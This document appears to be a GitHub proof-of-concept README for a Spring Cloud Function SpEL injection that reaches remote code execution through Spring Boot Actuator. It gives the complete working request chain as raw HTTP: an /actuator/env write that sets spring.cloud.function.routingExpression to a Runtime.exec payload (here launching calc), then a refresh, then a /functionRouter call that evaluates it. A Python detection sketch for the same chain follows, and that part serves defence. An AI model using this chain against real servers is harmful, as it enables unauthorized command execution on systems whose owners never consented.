
testivy/springboot-actuator-spring-cloud-function-rce

springboot-actuator-routingExpression-rce

Spring Cloud Function SPEL injection with the help of actuator.

This closely resembles the Spring Cloud Gateway RCE (CVE-2022-22947): the attack goes through the env endpoint of Spring Boot Actuator, as shown below.

The first step is to set spring.cloud.function.routingExpression to a malicious SpEL expression.


POST /actuator/env HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: application/json
Content-Length: 109

{"name":"spring.cloud.function.routingExpression","value":"T(java.lang.Runtime).getRuntime().exec('calc')"}

The next step is to refresh the environment variables.

POST /actuator/refresh HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

Finally, request /functionRouter so that the routingExpression is evaluated:

POST /functionRouter/qqq HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

aaa

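Spring Cloud Function SpEL injection based on Spring Boot Actuator

  • In the latest version, 3.2.3, the Spring Cloud Function maintainers fixed the earlier SpEL injection vulnerability (commit dc5128b). However, the author found that the spring.cloud.function.routingExpression parameter in the configuration file is also a SpEL injection point, so in theory the vulnerability can be triggered whenever the value of functionProperties.getRoutingExpression() can be controlled.
  • When the project includes actuator and the env endpoint is enabled, RCE can be achieved.

Request the /env endpoint to write the configuration.

Request the /refresh endpoint so that the new configuration takes effect.

Finally, request /functionRouter to execute the routingExpression.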
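A detection sketch for the three-request chain described above, as an added example that is not part of the original repository: it correlates, per target host, a write to /actuator/env that touches the routing expression, a following /actuator/refresh, and a later /functionRouter request. It assumes proxy or WAF records that include the request body and the default /actuator base path; the record layout, host names and alert labels are hypothetical.

```python
import json
import re

# Property name is from the page; the SpEL type-reference regex is an added heuristic.
WATCHED_PROPERTY = "spring.cloud.function.routingExpression"
SPEL_TYPE_REF = re.compile(r"\bT\s*\(\s*[\w.$]+\s*\)")

def classify(method, path, body):
    """Map one request to a stage of the chain, or None if unrelated."""
    path = path.split("?", 1)[0].rstrip("/")
    if "/functionRouter" in path:
        return "route"
    if method != "POST":
        return None
    if path.endswith("/actuator/refresh"):
        return "refresh"
    if path.endswith("/actuator/env"):
        try:
            doc = json.loads(body or "{}")
            name, value = str(doc.get("name", "")), str(doc.get("value", ""))
        except (ValueError, AttributeError):  # not JSON, or not a JSON object
            return None
        if name == WATCHED_PROPERTY or SPEL_TYPE_REF.search(value):
            return "env_write"
    return None

def detect(events):
    """events: (host, method, path, body) in time order; state is per target host,
    since the rewritten property affects the whole instance, whoever calls it later."""
    stage_reached, alerts = {}, []
    for host, method, path, body in events:
        stage = classify(method, path, body)
        reached = stage_reached.get(host, 0)
        if stage == "env_write":
            stage_reached[host] = 1
            alerts.append((host, "env_write"))
        elif stage == "refresh" and reached >= 1:
            stage_reached[host] = 2
            alerts.append((host, "refresh_after_env_write"))
        elif stage == "route" and reached == 2:
            alerts.append((host, "route_after_refresh"))
    return alerts

# Constructed sample records (not captured traffic); hosts and values are placeholders.
SAMPLE = [
    ("app-b:9000", "POST", "/actuator/env", '{"name":"logging.level.root","value":"DEBUG"}'),
    ("app-b:9000", "POST", "/actuator/refresh", ""),
    ("app-a:9000", "POST", "/actuator/env", '{"name":"%s","value":"<placeholder>"}' % WATCHED_PROPERTY),
    ("app-a:9000", "POST", "/actuator/refresh", ""),
    ("app-a:9000", "POST", "/functionRouter/qqq", "aaa"),
]
```

Calling `detect(SAMPLE)` raises the three alerts for app-a only; the ordinary logging change and the lone refresh on app-b stay quiet.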


More

WeChat official account article
